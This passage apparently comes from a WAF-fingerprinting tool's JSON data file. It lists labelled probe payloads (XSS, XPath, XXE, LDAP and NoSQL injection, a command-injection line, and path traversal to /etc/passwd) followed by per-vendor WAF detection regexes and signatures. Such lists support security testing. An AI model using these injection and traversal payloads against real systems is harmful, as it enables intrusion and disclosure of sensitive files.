even if it has no contents." + return True + + def __setitem__(self, key, value): + """Setting tag[key] sets the value of the 'key' attribute for the + tag.""" + self._getAttrMap() + self.attrMap[key] = value + found = False + for i in xrange(0, len(self.attrs)): + if self.attrs[i][0] == key: + self.attrs[i] = (key, value) + found = True + if not found: + self.attrs.append((key, value)) + self._getAttrMap()[key] = value + + def __delitem__(self, key): + "Deleting tag[key] deletes all 'key' attributes for the tag." + for item in self.attrs: + if item[0] == key: + self.attrs.remove(item) + #We don't break because bad HTML can define the same + #attribute multiple times. + self._getAttrMap() + if self.attrMap.has_key(key): + del self.attrMap[key] + + def __call__(self, *args, **kwargs): + """Calling a tag like a function is the same as calling its + findAll() method. Eg. tag('a') returns a list of all the A tags + found within this tag.""" + return self.findAll(*args, **kwargs) + + def __getattr__(self, tag): + #print "Getattr %s.%s" % (self.__class__, tag) + if len(tag) > 3 and tag.rfind('Tag') == len(tag)-3: + return self.find(tag[:-3]) + elif tag.find('__') != 0: + return self.find(tag) + raise AttributeError("'%s' object has no attribute '%s'" % (self.__class__, tag)) + + def __eq__(self, other): + """Returns true iff this tag has the same name, the same attributes, + and the same contents (recursively) as the given tag. + + NOTE: right now this will return false if two tags have the + same attributes in a different order. Should this be fixed?""" + if other is self: + return True + if not hasattr(other, 'name') or not hasattr(other, 'attrs') or not hasattr(other, 'contents') or self.name != other.name or self.attrs != other.attrs or len(self) != len(other): + return False + for i in xrange(0, len(self.contents)): + if self.contents[i] != other.contents[i]: + return False + return True + + def __ne__(self, other): + """Returns true iff this tag is not identical to the other tag, + as defined in __eq__.""" + return not self == other + + def __repr__(self, encoding=DEFAULT_OUTPUT_ENCODING): + """Renders this tag as a string.""" + return self.__str__(encoding) + + def __unicode__(self): + return self.__str__(None) + + def __str__(self, encoding=DEFAULT_OUTPUT_ENCODING, + prettyPrint=False, indentLevel=0): + """Returns a string or Unicode representation of this tag and + its contents. To get Unicode, pass None for encoding. + + NOTE: since Python's HTML parser consumes whitespace, this + method is not certain to reproduce the whitespace present in + the original string.""" + + encodedName = self.toEncoding(self.name, encoding) + + attrs = [] + if self.attrs: + for key, val in self.attrs: + fmt = '%s="%s"' + if isinstance(val, basestring): + if self.containsSubstitutions and '%SOUP-ENCODING%' in val: + val = self.substituteEncoding(val, encoding) + + # The attribute value either: + # + # * Contains no embedded double quotes or single quotes. + # No problem: we enclose it in double quotes. + # * Contains embedded single quotes. No problem: + # double quotes work here too. + # * Contains embedded double quotes. No problem: + # we enclose it in single quotes. + # * Embeds both single _and_ double quotes. This + # can't happen naturally, but it can happen if + # you modify an attribute value after parsing + # the document. Now we have a bit of a + # problem. We solve it by enclosing the + # attribute in single quotes, and escaping any + # embedded single quotes to XML entities. + if '"' in val: + fmt = "%s='%s'" + if "'" in val: + # TODO: replace with apos when + # appropriate. + val = val.replace("'", "&squot;") + + # Now we're okay w/r/t quotes. But the attribute + # value might also contain angle brackets, or + # ampersands that aren't part of entities. We need + # to escape those to XML entities too. + val = self.BARE_AMPERSAND_OR_BRACKET.sub(self._sub_entity, val) + + attrs.append(fmt % (self.toEncoding(key, encoding), + self.toEncoding(val, encoding))) + close = '' + closeTag = '' + if self.isSelfClosing: + close = ' /' + else: + closeTag = '' % encodedName + + indentTag, indentContents = 0, 0 + if prettyPrint: + indentTag = indentLevel + space = (' ' * (indentTag-1)) + indentContents = indentTag + 1 + contents = self.renderContents(encoding, prettyPrint, indentContents) + if self.hidden: + s = contents + else: + s = [] + attributeString = '' + if attrs: + attributeString = ' ' + ' '.join(attrs) + if prettyPrint: + s.append(space) + s.append('<%s%s%s>' % (encodedName, attributeString, close)) + if prettyPrint: + s.append("\n") + s.append(contents) + if prettyPrint and contents and contents[-1] != "\n": + s.append("\n") + if prettyPrint and closeTag: + s.append(space) + s.append(closeTag) + if prettyPrint and closeTag and self.nextSibling: + s.append("\n") + s = ''.join(s) + return s + + def decompose(self): + """Recursively destroys the contents of this tree.""" + self.extract() + if len(self.contents) == 0: + return + current = self.contents[0] + while current is not None: + next = current.next + if isinstance(current, Tag): + del current.contents[:] + current.parent = None + current.previous = None + current.previousSibling = None + current.next = None + current.nextSibling = None + current = next + + def prettify(self, encoding=DEFAULT_OUTPUT_ENCODING): + return self.__str__(encoding, True) + + def renderContents(self, encoding=DEFAULT_OUTPUT_ENCODING, + prettyPrint=False, indentLevel=0): + """Renders the contents of this tag as a string in the given + encoding. If encoding is None, returns a Unicode string..""" + s=[] + for c in self: + text = None + if isinstance(c, NavigableString): + text = c.__str__(encoding) + elif isinstance(c, Tag): + s.append(c.__str__(encoding, prettyPrint, indentLevel)) + if text and prettyPrint: + text = text.strip() + if text: + if prettyPrint: + s.append(" " * (indentLevel-1)) + s.append(text) + if prettyPrint: + s.append("\n") + + return ''.join(s) + + #Soup methods + + def find(self, name=None, attrs={}, recursive=True, text=None, + **kwargs): + """Return only the first child of this Tag matching the given + criteria.""" + r = None + l = self.findAll(name, attrs, recursive, text, 1, **kwargs) + if l: + r = l[0] + return r + findChild = find + + def findAll(self, name=None, attrs={}, recursive=True, text=None, + limit=None, **kwargs): + """Extracts a list of Tag objects that match the given + criteria. You can specify the name of the Tag and any + attributes you want the Tag to have. + + The value of a key-value pair in the 'attrs' map can be a + string, a list of strings, a regular expression object, or a + callable that takes a string and returns whether or not the + string matches for some custom definition of 'matches'. The + same is true of the tag name.""" + generator = self.recursiveChildGenerator + if not recursive: + generator = self.childGenerator + return self._findAll(name, attrs, text, limit, generator, **kwargs) + findChildren = findAll + + # Pre-3.x compatibility methods + first = find + fetch = findAll + + def fetchText(self, text=None, recursive=True, limit=None): + return self.findAll(text=text, recursive=recursive, limit=limit) + + def firstText(self, text=None, recursive=True): + return self.find(text=text, recursive=recursive) + + #Private methods + + def _getAttrMap(self): + """Initializes a map representation of this tag's attributes, + if not already initialized.""" + if not getattr(self, 'attrMap'): + self.attrMap = {} + for (key, value) in self.attrs: + self.attrMap[key] = value + return self.attrMap + + #Generator methods + def childGenerator(self): + # Just use the iterator from the contents + return iter(self.contents) + + def recursiveChildGenerator(self): + if not len(self.contents): + return # Note: https://stackoverflow.com/a/30217723 (PEP 479) + stopNode = self._lastRecursiveChild().next + current = self.contents[0] + while current and current is not stopNode: + yield current + current = current.next + + +# Next, a couple classes to represent queries and their results. +class SoupStrainer: + """Encapsulates a number of ways of matching a markup element (tag or + text).""" + + def __init__(self, name=None, attrs={}, text=None, **kwargs): + self.name = name + if isinstance(attrs, basestring): + kwargs['class'] = _match_css_class(attrs) + attrs = None + if kwargs: + if attrs: + attrs = attrs.copy() + attrs.update(kwargs) + else: + attrs = kwargs + self.attrs = attrs + self.text = text + + def __str__(self): + if self.text: + return self.text + else: + return "%s|%s" % (self.name, self.attrs) + + def searchTag(self, markupName=None, markupAttrs={}): + found = None + markup = None + if isinstance(markupName, Tag): + markup = markupName + markupAttrs = markup + callFunctionWithTagData = callable(self.name) \ + and not isinstance(markupName, Tag) + + if (not self.name) \ + or callFunctionWithTagData \ + or (markup and self._matches(markup, self.name)) \ + or (not markup and self._matches(markupName, self.name)): + if callFunctionWithTagData: + match = self.name(markupName, markupAttrs) + else: + match = True + markupAttrMap = None + for attr, matchAgainst in self.attrs.items(): + if not markupAttrMap: + if hasattr(markupAttrs, 'get'): + markupAttrMap = markupAttrs + else: + markupAttrMap = {} + for k,v in markupAttrs: + markupAttrMap[k] = v + attrValue = markupAttrMap.get(attr) + if not self._matches(attrValue, matchAgainst): + match = False + break + if match: + if markup: + found = markup + else: + found = markupName + return found + + def search(self, markup): + #print 'looking for %s in %s' % (self, markup) + found = None + # If given a list of items, scan it for a text element that + # matches. + if hasattr(markup, "__iter__") \ + and not isinstance(markup, Tag): + for element in markup: + if isinstance(element, NavigableString) \ + and self.search(element): + found = element + break + # If it's a Tag, make sure its name or attributes match. + # Don't bother with Tags if we're searching for text. + elif isinstance(markup, Tag): + if not self.text: + found = self.searchTag(markup) + # If it's text, make sure the text matches. + elif isinstance(markup, NavigableString) or \ + isinstance(markup, basestring): + if self._matches(markup, self.text): + found = markup + else: + raise Exception("I don't know how to match against a %s" \ + % markup.__class__) + return found + + def _matches(self, markup, matchAgainst): + #print "Matching %s against %s" % (markup, matchAgainst) + result = False + if matchAgainst is True: + result = markup is not None + elif callable(matchAgainst): + result = matchAgainst(markup) + else: + #Custom match methods take the tag as an argument, but all + #other ways of matching match the tag name as a string. + if isinstance(markup, Tag): + markup = markup.name + if markup and not isinstance(markup, basestring): + markup = text_type(markup) + #Now we know that chunk is either a string, or None. + if hasattr(matchAgainst, 'match'): + # It's a regexp object. + result = markup and matchAgainst.search(markup) + elif hasattr(matchAgainst, '__iter__'): # list-like + result = markup in matchAgainst + elif hasattr(matchAgainst, 'items'): + result = markup.has_key(matchAgainst) + elif matchAgainst and isinstance(markup, basestring): + if isinstance(markup, text_type): + matchAgainst = text_type(matchAgainst) + else: + matchAgainst = str(matchAgainst) + + if not result: + result = matchAgainst == markup + return result + +class ResultSet(list): + """A ResultSet is just a list that keeps track of the SoupStrainer + that created it.""" + def __init__(self, source): + list.__init__([]) + self.source = source + +# Now, some helper functions. + +def buildTagMap(default, *args): + """Turns a list of maps, lists, or scalars into a single map. + Used to build the SELF_CLOSING_TAGS, NESTABLE_TAGS, and + NESTING_RESET_TAGS maps out of lists and partial maps.""" + built = {} + for portion in args: + if hasattr(portion, 'items'): + #It's a map. Merge it. + for k,v in portion.items(): + built[k] = v + elif hasattr(portion, '__iter__'): # is a list + #It's a list. Map each item to the default. + for k in portion: + built[k] = default + else: + #It's a scalar. Map it to the default. + built[portion] = default + return built + +# Now, the parser classes. + +class BeautifulStoneSoup(Tag, sgmllib.SGMLParser): + + """This class contains the basic parser and search code. It defines + a parser that knows nothing about tag behavior except for the + following: + + You can't close a tag without closing all the tags it encloses. + That is, "" actually means + "". + + [Another possible explanation is "", but since + this class defines no SELF_CLOSING_TAGS, it will never use that + explanation.] + + This class is useful for parsing XML or made-up markup languages, + or when BeautifulSoup makes an assumption counter to what you were + expecting.""" + + SELF_CLOSING_TAGS = {} + NESTABLE_TAGS = {} + RESET_NESTING_TAGS = {} + QUOTE_TAGS = {} + PRESERVE_WHITESPACE_TAGS = [] + + MARKUP_MASSAGE = [(re.compile(r'(<[^<>]*)/>'), + lambda x: x.group(1) + ' />'), + (re.compile(r']*)>'), + lambda x: '') + ] + + ROOT_TAG_NAME = u'[document]' + + HTML_ENTITIES = "html" + XML_ENTITIES = "xml" + XHTML_ENTITIES = "xhtml" + # TODO: This only exists for backwards-compatibility + ALL_ENTITIES = XHTML_ENTITIES + + # Used when determining whether a text node is all whitespace and + # can be replaced with a single space. A text node that contains + # fancy Unicode spaces (usually non-breaking) should be left + # alone. + STRIP_ASCII_SPACES = { 9: None, 10: None, 12: None, 13: None, 32: None, } + + def __init__(self, markup="", parseOnlyThese=None, fromEncoding=None, + markupMassage=True, smartQuotesTo=XML_ENTITIES, + convertEntities=None, selfClosingTags=None, isHTML=False): + """The Soup object is initialized as the 'root tag', and the + provided markup (which can be a string or a file-like object) + is fed into the underlying parser. + + sgmllib will process most bad HTML, and the BeautifulSoup + class has some tricks for dealing with some HTML that kills + sgmllib, but Beautiful Soup can nonetheless choke or lose data + if your data uses self-closing tags or declarations + incorrectly. + + By default, Beautiful Soup uses regexes to sanitize input, + avoiding the vast majority of these problems. If the problems + don't apply to you, pass in False for markupMassage, and + you'll get better performance. + + The default parser massage techniques fix the two most common + instances of invalid HTML that choke sgmllib: + +
    (No space between name of closing tag and tag close) + (Extraneous whitespace in declaration) + + You can pass in a custom list of (RE object, replace method) + tuples to get Beautiful Soup to scrub your input the way you + want.""" + + self.parseOnlyThese = parseOnlyThese + self.fromEncoding = fromEncoding + self.smartQuotesTo = smartQuotesTo + self.convertEntities = convertEntities + # Set the rules for how we'll deal with the entities we + # encounter + if self.convertEntities: + # It doesn't make sense to convert encoded characters to + # entities even while you're converting entities to Unicode. + # Just convert it all to Unicode. + self.smartQuotesTo = None + if convertEntities == self.HTML_ENTITIES: + self.convertXMLEntities = False + self.convertHTMLEntities = True + self.escapeUnrecognizedEntities = True + elif convertEntities == self.XHTML_ENTITIES: + self.convertXMLEntities = True + self.convertHTMLEntities = True + self.escapeUnrecognizedEntities = False + elif convertEntities == self.XML_ENTITIES: + self.convertXMLEntities = True + self.convertHTMLEntities = False + self.escapeUnrecognizedEntities = False + else: + self.convertXMLEntities = False + self.convertHTMLEntities = False + self.escapeUnrecognizedEntities = False + + self.instanceSelfClosingTags = buildTagMap(None, selfClosingTags) + sgmllib.SGMLParser.__init__(self) + + if hasattr(markup, 'read'): # It's a file-type object. + markup = markup.read() + self.markup = markup + self.markupMassage = markupMassage + try: + self._feed(isHTML=isHTML) + except StopParsing: + pass + self.markup = None # The markup can now be GCed + + def convert_charref(self, name): + """This method fixes a bug in Python's SGMLParser.""" + try: + n = int(name) + except ValueError: + return + if not 0 <= n <= 127 : # ASCII ends at 127, not 255 + return + return self.convert_codepoint(n) + + def _feed(self, inDocumentEncoding=None, isHTML=False): + # Convert the document to Unicode. + markup = self.markup + if isinstance(markup, text_type): + if not hasattr(self, 'originalEncoding'): + self.originalEncoding = None + else: + dammit = UnicodeDammit\ + (markup, [self.fromEncoding, inDocumentEncoding], + smartQuotesTo=self.smartQuotesTo, isHTML=isHTML) + markup = dammit.unicode + self.originalEncoding = dammit.originalEncoding + self.declaredHTMLEncoding = dammit.declaredHTMLEncoding + if markup: + if self.markupMassage: + if not hasattr(self.markupMassage, "__iter__"): + self.markupMassage = self.MARKUP_MASSAGE + for fix, m in self.markupMassage: + markup = fix.sub(m, markup) + # TODO: We get rid of markupMassage so that the + # soup object can be deepcopied later on. Some + # Python installations can't copy regexes. If anyone + # was relying on the existence of markupMassage, this + # might cause problems. + del(self.markupMassage) + self.reset() + + sgmllib.SGMLParser.feed(self, markup) + # Close out any unfinished strings and close all the open tags. + self.endData() + while self.currentTag.name != self.ROOT_TAG_NAME: + self.popTag() + + def __getattr__(self, methodName): + """This method routes method call requests to either the SGMLParser + superclass or the Tag superclass, depending on the method name.""" + #print "__getattr__ called on %s.%s" % (self.__class__, methodName) + + if methodName.startswith('start_') or methodName.startswith('end_') \ + or methodName.startswith('do_'): + return sgmllib.SGMLParser.__getattr__(self, methodName) + elif not methodName.startswith('__'): + return Tag.__getattr__(self, methodName) + else: + raise AttributeError + + def isSelfClosingTag(self, name): + """Returns true iff the given string is the name of a + self-closing tag according to this parser.""" + return name in self.SELF_CLOSING_TAGS \ + or name in self.instanceSelfClosingTags + + def reset(self): + Tag.__init__(self, self, self.ROOT_TAG_NAME) + self.hidden = 1 + sgmllib.SGMLParser.reset(self) + self.currentData = [] + self.currentTag = None + self.tagStack = [] + self.quoteStack = [] + self.pushTag(self) + + def popTag(self): + tag = self.tagStack.pop() + + #print "Pop", tag.name + if self.tagStack: + self.currentTag = self.tagStack[-1] + return self.currentTag + + def pushTag(self, tag): + #print "Push", tag.name + if self.currentTag: + self.currentTag.contents.append(tag) + self.tagStack.append(tag) + self.currentTag = self.tagStack[-1] + + def endData(self, containerClass=NavigableString): + if self.currentData: + currentData = u''.join(self.currentData) + if (currentData.translate(self.STRIP_ASCII_SPACES) == '' and + not set([tag.name for tag in self.tagStack]).intersection( + self.PRESERVE_WHITESPACE_TAGS)): + if '\n' in currentData: + currentData = '\n' + else: + currentData = ' ' + self.currentData = [] + if self.parseOnlyThese and len(self.tagStack) <= 1 and \ + (not self.parseOnlyThese.text or \ + not self.parseOnlyThese.search(currentData)): + return + o = containerClass(currentData) + o.setup(self.currentTag, self.previous) + if self.previous: + self.previous.next = o + self.previous = o + self.currentTag.contents.append(o) + + + def _popToTag(self, name, inclusivePop=True): + """Pops the tag stack up to and including the most recent + instance of the given tag. If inclusivePop is false, pops the tag + stack up to but *not* including the most recent instqance of + the given tag.""" + #print "Popping to %s" % name + if name == self.ROOT_TAG_NAME: + return + + numPops = 0 + mostRecentTag = None + for i in xrange(len(self.tagStack)-1, 0, -1): + if name == self.tagStack[i].name: + numPops = len(self.tagStack)-i + break + if not inclusivePop: + numPops = numPops - 1 + + for i in xrange(0, numPops): + mostRecentTag = self.popTag() + return mostRecentTag + + def _smartPop(self, name): + + """We need to pop up to the previous tag of this type, unless + one of this tag's nesting reset triggers comes between this + tag and the previous tag of this type, OR unless this tag is a + generic nesting trigger and another generic nesting trigger + comes between this tag and the previous tag of this type. + + Examples: +

    FooBar *

    * should pop to 'p', not 'b'. +

    FooBar *

    * should pop to 'table', not 'p'. +

    Foo

    Bar *

    * should pop to 'tr', not 'p'. + +

    • *
    • * should pop to 'ul', not the first 'li'. +
  • ** should pop to 'table', not the first 'tr' + tag should + implicitly close the previous tag within the same
    ** should pop to 'tr', not the first 'td' + """ + + nestingResetTriggers = self.NESTABLE_TAGS.get(name) + isNestable = nestingResetTriggers != None + isResetNesting = name in self.RESET_NESTING_TAGS + popTo = None + inclusive = True + for i in xrange(len(self.tagStack)-1, 0, -1): + p = self.tagStack[i] + if (not p or p.name == name) and not isNestable: + #Non-nestable tags get popped to the top or to their + #last occurance. + popTo = name + break + if (nestingResetTriggers is not None + and p.name in nestingResetTriggers) \ + or (nestingResetTriggers is None and isResetNesting + and p.name in self.RESET_NESTING_TAGS): + + #If we encounter one of the nesting reset triggers + #peculiar to this tag, or we encounter another tag + #that causes nesting to reset, pop up to but not + #including that tag. + popTo = p.name + inclusive = False + break + p = p.parent + if popTo: + self._popToTag(popTo, inclusive) + + def unknown_starttag(self, name, attrs, selfClosing=0): + #print "Start tag %s: %s" % (name, attrs) + if self.quoteStack: + #This is not a real tag. + #print "<%s> is not real!" % name + attrs = ''.join([' %s="%s"' % (x, y) for x, y in attrs]) + self.handle_data('<%s%s>' % (name, attrs)) + return + self.endData() + + if not self.isSelfClosingTag(name) and not selfClosing: + self._smartPop(name) + + if self.parseOnlyThese and len(self.tagStack) <= 1 \ + and (self.parseOnlyThese.text or not self.parseOnlyThese.searchTag(name, attrs)): + return + + tag = Tag(self, name, attrs, self.currentTag, self.previous) + if self.previous: + self.previous.next = tag + self.previous = tag + self.pushTag(tag) + if selfClosing or self.isSelfClosingTag(name): + self.popTag() + if name in self.QUOTE_TAGS: + #print "Beginning quote (%s)" % name + self.quoteStack.append(name) + self.literal = 1 + return tag + + def unknown_endtag(self, name): + #print "End tag %s" % name + if self.quoteStack and self.quoteStack[-1] != name: + #This is not a real end tag. + #print " is not real!" % name + self.handle_data('' % name) + return + self.endData() + self._popToTag(name) + if self.quoteStack and self.quoteStack[-1] == name: + self.quoteStack.pop() + self.literal = (len(self.quoteStack) > 0) + + def handle_data(self, data): + self.currentData.append(data) + + def _toStringSubclass(self, text, subclass): + """Adds a certain piece of text to the tree as a NavigableString + subclass.""" + self.endData() + self.handle_data(text) + self.endData(subclass) + + def handle_pi(self, text): + """Handle a processing instruction as a ProcessingInstruction + object, possibly one with a %SOUP-ENCODING% slot into which an + encoding will be plugged later.""" + if text[:3] == "xml": + text = u"xml version='1.0' encoding='%SOUP-ENCODING%'" + self._toStringSubclass(text, ProcessingInstruction) + + def handle_comment(self, text): + "Handle comments as Comment objects." + self._toStringSubclass(text, Comment) + + def handle_charref(self, ref): + "Handle character references as data." + if self.convertEntities: + data = unichr(int(ref)) + else: + data = '&#%s;' % ref + self.handle_data(data) + + def handle_entityref(self, ref): + """Handle entity references as data, possibly converting known + HTML and/or XML entity references to the corresponding Unicode + characters.""" + data = None + if self.convertHTMLEntities: + try: + data = unichr(name2codepoint[ref]) + except KeyError: + pass + + if not data and self.convertXMLEntities: + data = self.XML_ENTITIES_TO_SPECIAL_CHARS.get(ref) + + if not data and self.convertHTMLEntities and \ + not self.XML_ENTITIES_TO_SPECIAL_CHARS.get(ref): + # TODO: We've got a problem here. We're told this is + # an entity reference, but it's not an XML entity + # reference or an HTML entity reference. Nonetheless, + # the logical thing to do is to pass it through as an + # unrecognized entity reference. + # + # Except: when the input is "&carol;" this function + # will be called with input "carol". When the input is + # "AT&T", this function will be called with input + # "T". We have no way of knowing whether a semicolon + # was present originally, so we don't know whether + # this is an unknown entity or just a misplaced + # ampersand. + # + # The more common case is a misplaced ampersand, so I + # escape the ampersand and omit the trailing semicolon. + data = "&%s" % ref + if not data: + # This case is different from the one above, because we + # haven't already gone through a supposedly comprehensive + # mapping of entities to Unicode characters. We might not + # have gone through any mapping at all. So the chances are + # very high that this is a real entity, and not a + # misplaced ampersand. + data = "&%s;" % ref + self.handle_data(data) + + def handle_decl(self, data): + "Handle DOCTYPEs and the like as Declaration objects." + self._toStringSubclass(data, Declaration) + + def parse_declaration(self, i): + """Treat a bogus SGML declaration as raw data. Treat a CDATA + declaration as a CData object.""" + j = None + if self.rawdata[i:i+9] == '', i) + if k == -1: + k = len(self.rawdata) + data = self.rawdata[i+9:k] + j = k+3 + self._toStringSubclass(data, CData) + else: + try: + j = sgmllib.SGMLParser.parse_declaration(self, i) + except sgmllib.SGMLParseError: + toHandle = self.rawdata[i:] + self.handle_data(toHandle) + j = i + len(toHandle) + return j + +class BeautifulSoup(BeautifulStoneSoup): + + """This parser knows the following facts about HTML: + + * Some tags have no closing tag and should be interpreted as being + closed as soon as they are encountered. + + * The text inside some tags (ie. 'script') may contain tags which + are not really part of the document and which should be parsed + as text, not tags. If you want to parse the text as tags, you can + always fetch it and parse it explicitly. + + * Tag nesting rules: + + Most tags can't be nested at all. For instance, the occurance of + a

    tag should implicitly close the previous

    tag. + +

    Para1

    Para2 + should be transformed into: +

    Para1

    Para2 + + Some tags can be nested arbitrarily. For instance, the occurance + of a

    tag should _not_ implicitly close the previous +
    tag. + + Alice said:
    Bob said:
    Blah + should NOT be transformed into: + Alice said:
    Bob said:
    Blah + + Some tags can be nested, but the nesting is reset by the + interposition of other tags. For instance, a
    , + but not close a tag in another table. + +
    BlahBlah + should be transformed into: +
    BlahBlah + but, + Blah
    Blah + should NOT be transformed into + Blah
    Blah + + Differing assumptions about tag nesting rules are a major source + of problems with the BeautifulSoup class. If BeautifulSoup is not + treating as nestable a tag your page author treats as nestable, + try ICantBelieveItsBeautifulSoup, MinimalSoup, or + BeautifulStoneSoup before writing your own subclass.""" + + def __init__(self, *args, **kwargs): + if 'smartQuotesTo' not in kwargs: + kwargs['smartQuotesTo'] = self.HTML_ENTITIES + kwargs['isHTML'] = True + BeautifulStoneSoup.__init__(self, *args, **kwargs) + + SELF_CLOSING_TAGS = buildTagMap(None, + ('br' , 'hr', 'input', 'img', 'meta', + 'spacer', 'link', 'frame', 'base', 'col')) + + PRESERVE_WHITESPACE_TAGS = set(['pre', 'textarea']) + + QUOTE_TAGS = {'script' : None, 'textarea' : None} + + #According to the HTML standard, each of these inline tags can + #contain another tag of the same type. Furthermore, it's common + #to actually use these tags this way. + NESTABLE_INLINE_TAGS = ('span', 'font', 'q', 'object', 'bdo', 'sub', 'sup', + 'center') + + #According to the HTML standard, these block tags can contain + #another tag of the same type. Furthermore, it's common + #to actually use these tags this way. + NESTABLE_BLOCK_TAGS = ('blockquote', 'div', 'fieldset', 'ins', 'del') + + #Lists can contain other lists, but there are restrictions. + NESTABLE_LIST_TAGS = { 'ol' : [], + 'ul' : [], + 'li' : ['ul', 'ol'], + 'dl' : [], + 'dd' : ['dl'], + 'dt' : ['dl'] } + + #Tables can contain other tables, but there are restrictions. + NESTABLE_TABLE_TAGS = {'table' : [], + 'tr' : ['table', 'tbody', 'tfoot', 'thead'], + 'td' : ['tr'], + 'th' : ['tr'], + 'thead' : ['table'], + 'tbody' : ['table'], + 'tfoot' : ['table'], + } + + NON_NESTABLE_BLOCK_TAGS = ('address', 'form', 'p', 'pre') + + #If one of these tags is encountered, all tags up to the next tag of + #this type are popped. + RESET_NESTING_TAGS = buildTagMap(None, NESTABLE_BLOCK_TAGS, 'noscript', + NON_NESTABLE_BLOCK_TAGS, + NESTABLE_LIST_TAGS, + NESTABLE_TABLE_TAGS) + + NESTABLE_TAGS = buildTagMap([], NESTABLE_INLINE_TAGS, NESTABLE_BLOCK_TAGS, + NESTABLE_LIST_TAGS, NESTABLE_TABLE_TAGS) + + # Used to detect the charset in a META tag; see start_meta + CHARSET_RE = re.compile(r"((^|;)\s*charset=)([^;]*)", re.M) + + def start_meta(self, attrs): + """Beautiful Soup can detect a charset included in a META tag, + try to convert the document to that charset, and re-parse the + document from the beginning.""" + httpEquiv = None + contentType = None + contentTypeIndex = None + tagNeedsEncodingSubstitution = False + + for i in xrange(0, len(attrs)): + key, value = attrs[i] + key = key.lower() + if key == 'http-equiv': + httpEquiv = value + elif key == 'content': + contentType = value + contentTypeIndex = i + + if httpEquiv and contentType: # It's an interesting meta tag. + match = self.CHARSET_RE.search(contentType) + if match: + if (self.declaredHTMLEncoding is not None or + self.originalEncoding == self.fromEncoding): + # An HTML encoding was sniffed while converting + # the document to Unicode, or an HTML encoding was + # sniffed during a previous pass through the + # document, or an encoding was specified + # explicitly and it worked. Rewrite the meta tag. + def rewrite(match): + return match.group(1) + "%SOUP-ENCODING%" + newAttr = self.CHARSET_RE.sub(rewrite, contentType) + attrs[contentTypeIndex] = (attrs[contentTypeIndex][0], + newAttr) + tagNeedsEncodingSubstitution = True + else: + # This is our first pass through the document. + # Go through it again with the encoding information. + newCharset = match.group(3) + if newCharset and newCharset != self.originalEncoding: + self.declaredHTMLEncoding = newCharset + self._feed(self.declaredHTMLEncoding) + raise StopParsing + pass + tag = self.unknown_starttag("meta", attrs) + if tag and tagNeedsEncodingSubstitution: + tag.containsSubstitutions = True + +class StopParsing(Exception): + pass + +class ICantBelieveItsBeautifulSoup(BeautifulSoup): + + """The BeautifulSoup class is oriented towards skipping over + common HTML errors like unclosed tags. However, sometimes it makes + errors of its own. For instance, consider this fragment: + + FooBar + + This is perfectly valid (if bizarre) HTML. However, the + BeautifulSoup class will implicitly close the first b tag when it + encounters the second 'b'. It will think the author wrote + "FooBar", and didn't close the first 'b' tag, because + there's no real-world reason to bold something that's already + bold. When it encounters '' it will close two more 'b' + tags, for a grand total of three tags closed instead of two. This + can throw off the rest of your document structure. The same is + true of a number of other tags, listed below. + + It's much more common for someone to forget to close a 'b' tag + than to actually use nested 'b' tags, and the BeautifulSoup class + handles the common case. This class handles the not-co-common + case: where you can't believe someone wrote what they did, but + it's valid HTML and BeautifulSoup screwed up by assuming it + wouldn't be.""" + + I_CANT_BELIEVE_THEYRE_NESTABLE_INLINE_TAGS = \ + ('em', 'big', 'i', 'small', 'tt', 'abbr', 'acronym', 'strong', + 'cite', 'code', 'dfn', 'kbd', 'samp', 'strong', 'var', 'b', + 'big') + + I_CANT_BELIEVE_THEYRE_NESTABLE_BLOCK_TAGS = ('noscript',) + + NESTABLE_TAGS = buildTagMap([], BeautifulSoup.NESTABLE_TAGS, + I_CANT_BELIEVE_THEYRE_NESTABLE_BLOCK_TAGS, + I_CANT_BELIEVE_THEYRE_NESTABLE_INLINE_TAGS) + +class MinimalSoup(BeautifulSoup): + """The MinimalSoup class is for parsing HTML that contains + pathologically bad markup. It makes no assumptions about tag + nesting, but it does know which tags are self-closing, that + ", + "XSS::\\\";alert('XSS');//", + "XSS::1' onerror=alert(String.fromCharCode(88,83,83))>", + "XSS::var n=0;while(true){n++;}]]>", + "XSS::", + "XSS::javascript:alert(/XSS/)", + "XSS::", + "XPATHi::' and count(/*)=1 and '1'='1", + "XPATHi::count(/child::node())", + "XPATHi::' and count(/comment())=1 and '1'='1", + "XPATHi::' or '1'='1", + "XXE::]>&xxe;", + "LDAPi::admin*)((|userpassword=*)", + "LDAPi::user=*)(uid=*))(|(uid=*", + "LDAPi::*(|(objectclass=*))", + "NOSQLi::true, $where: '1 == 1'", + "NOSQLi::{ $ne: 1 }", + "NOSQLi::' } ], $comment:'success'", + "PHPi::", + "ACE::netstat -antup | grep :443; ping 127.0.0.1; curl http://www.google.com", + "PT:://///.htaccess", + "PT::/etc/passwd", + "PT::../../boot.ini", + "PT::C:/inetpub/wwwroot/global.asa" + ], + "wafs": { + "360": { + "company": "360", + "name": "360", + "regex": "493|/wzws-waf-cgi/", + "signatures": [ + "9778:RVZXum61OEhCWapBYKcPk4JzWOpohM4JiUcMr2RXg1uQJbX3uhdOnthtOj+hX7AB16FcPxJPdLsXo2tKaK99n+i7c4VmkwI3FZjxtDtAeq+c36A5chW1XaTC", + "9ccc:RVZXum61OEhCWapBYKcPk4JzWOpohM4JiUcMr2RXg1uQJbX3uhdOnthtOj+hX7AB16FcPxJPdLsXo2tKaK99n+i7c4VmkwI3FZjxtDtAeq+c36A4chW1XaTC" + ] + }, + "aesecure": { + "company": "aeSecure", + "name": "aeSecure", + "regex": "aesecure_denied\\.png|aesecure-code: \\d+", + "signatures": [ + "8a4b:RVdXu260OEhCWapBYKcPk4JzWOtohM4JiUcMrmRXg1uQJbX3uhdOn9htOj+hX7AB16FcPxJOdLsXo2tKaK99n+i7c4RmkgI2FZnxtDtBeq+c36A4chW1XaTD" + ] + }, + "airlock": { + "company": "Phion/Ergon", + "name": "Airlock", + "regex": "The server detected a syntax error in your request", + "signatures": [ + "3e2c:RVZXu261OEhCWapBYKcPk4JzWOtohM4IiUcMr2RXg1uQJbX3uhdOn9htOj+hX7AB16FcPxJPdLsXomtKaK59n+i6c4RmkwI2FZjxtDtAeq6c36A5chW1XaTD" + ] + }, + "alertlogic": { + "company": "Alert Logic", + "name": "Alert Logic", + "regex": "(?s)timed_redirect\\(seconds, url\\).+?

